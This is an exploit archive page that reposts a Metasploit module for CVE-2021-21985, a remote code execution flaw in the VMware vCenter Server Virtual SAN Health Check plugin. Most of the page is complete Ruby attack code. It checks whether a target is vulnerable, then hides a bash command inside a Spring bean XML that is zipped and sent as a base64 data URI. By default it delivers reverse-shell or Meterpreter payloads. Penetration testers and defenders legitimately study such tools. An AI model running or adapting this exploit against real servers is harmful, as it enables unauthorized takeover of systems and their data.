exploit the possibilities

VMware vCenter Server Virtual SAN Health Check Remote Code Execution

VMware vCenter Server Virtual SAN Health Check Remote Code Execution
Posted Jul 13, 2021
Authored by wvu, Ricter Z | Site metasploit.com

This Metasploit module exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin's ProxygenController class to execute code as the vsphere-ui user. See the vendor advisory for affected and patched versions. Tested against VMware vCenter Server 6.7 Update 3m (Linux appliance

tags | exploit, java
systems | linux
advisories | CVE-2021-21985
MD5 | e234bf71ac8d25a40b1cdd8ae081ea0d

VMware vCenter Server Virtual SAN Health Check Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(
update_info(
info,
'Name' => 'VMware vCenter Server Virtual SAN Health Check Plugin RCE',
'Description' => %q{
This module exploits Java unsafe reflection and SSRF in the VMware
vCenter Server Virtual SAN Health Check plugin's ProxygenController
class to execute code as the vsphere-ui user.

See the vendor advisory for affected and patched versions. Tested
against VMware vCenter Server 6.7 Update 3m (Linux appliance).
},
'Author' => [
'Ricter Z', # Discovery and PoC used
'wvu' # Analysis and exploit
],
'References' => [
['CVE', '2021-21985'],
['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0010.html'],
['URL', 'https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis'],
['URL', 'http://noahblog.360.cn/vcenter-cve-2021-2021-21985/'],
# Other great writeups!
['URL', 'https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/'],
['URL', 'https://testbnull.medium.com/a-quick-look-at-cve-2021-21985-vcenter-pre-auth-rce-9ecd459150a5'],
['URL', 'https://y4y.space/2021/06/04/learning-jndi-injection-from-cve-2021-21985/'],
['URL', 'https://github.com/alt3kx/CVE-2021-21985_PoC']
],
'DisclosureDate' => '2021-05-25',
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'], # TODO: Windows?
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
}
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [FIRST_ATTEMPT_FAIL], # SSRF can be a little finicky
'SideEffects' => [
IOC_IN_LOGS, # /var/log/vmware/vsphere-ui/logs/vsphere_client_virgo.log
ARTIFACTS_ON_DISK # CmdStager
]
}
)
)

register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end

def check
# https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(
target_uri.path,
'/ui/h5-vsan/rest/proxy/service/systemProperties/getProperty'
),
'ctype' => 'application/json',
'data' => {
'methodInput' => ['user.name', nil]
}.to_json
)

return CheckCode::Unknown unless res

unless res.code == 200 && res.get_json_document['result'] == 'vsphere-ui'
return CheckCode::Safe
end

CheckCode::Vulnerable('System property user.name is vsphere-ui.')
end

def exploit
print_status("Executing #{payload_instance.refname} (#{target.name})")

case target['Type']
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager
end
end

def execute_command(cmd, _opts = {})
vprint_status(cmd)

url = OfflineBundle.new(cmd).to_url

res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(
target_uri.path,
'/ui/h5-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages'
),
'ctype' => 'application/json',
'data' => {
'methodInput' => [
["https://localhost/vsanHealth/vum/driverOfflineBundle/#{url}"],
false # lazyInit
]
}.to_json
)

fail_with(Failure::PayloadFailed, cmd) unless res&.code == 200
end

class OfflineBundle
attr_accessor :cmd

def initialize(cmd)
@cmd = cmd
end

def to_xml
bean = Rex::Text.rand_text_alpha_lower(8..16)
prop = Rex::Text.rand_text_alpha_lower(8..16)

# https://www.tutorialspoint.com/spring/spring_bean_definition.htm
<<~XML
<beans>
<bean id="#{bean}" class="java.lang.ProcessBuilder">
<constructor-arg>
<list>
<value>/bin/bash</value>
<value>-c</value>
<value><![CDATA[#{cmd}]]></value>
</list>
</constructor-arg>
<property name="#{prop}" value="\#{#{bean}.start()}"/>
</bean>
</beans>
XML
end

def to_zip
Msf::Util::EXE.to_zip([
fname: 'offline_bundle.xml',
data: to_xml.gsub(/^\s+/, '').tr("\n", '')
])
end

def to_url
# https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/Data_URIs
"data:application/zip;base64,#{Rex::Text.encode_base64(to_zip)}"
end
end

end
Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    13 Files
  • 18
    Sep 18th
    2 Files
  • 19
    Sep 19th
    2 Files
  • 20
    Sep 20th
    14 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    28 Files
  • 23
    Sep 23rd
    13 Files
  • 24
    Sep 24th
    10 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close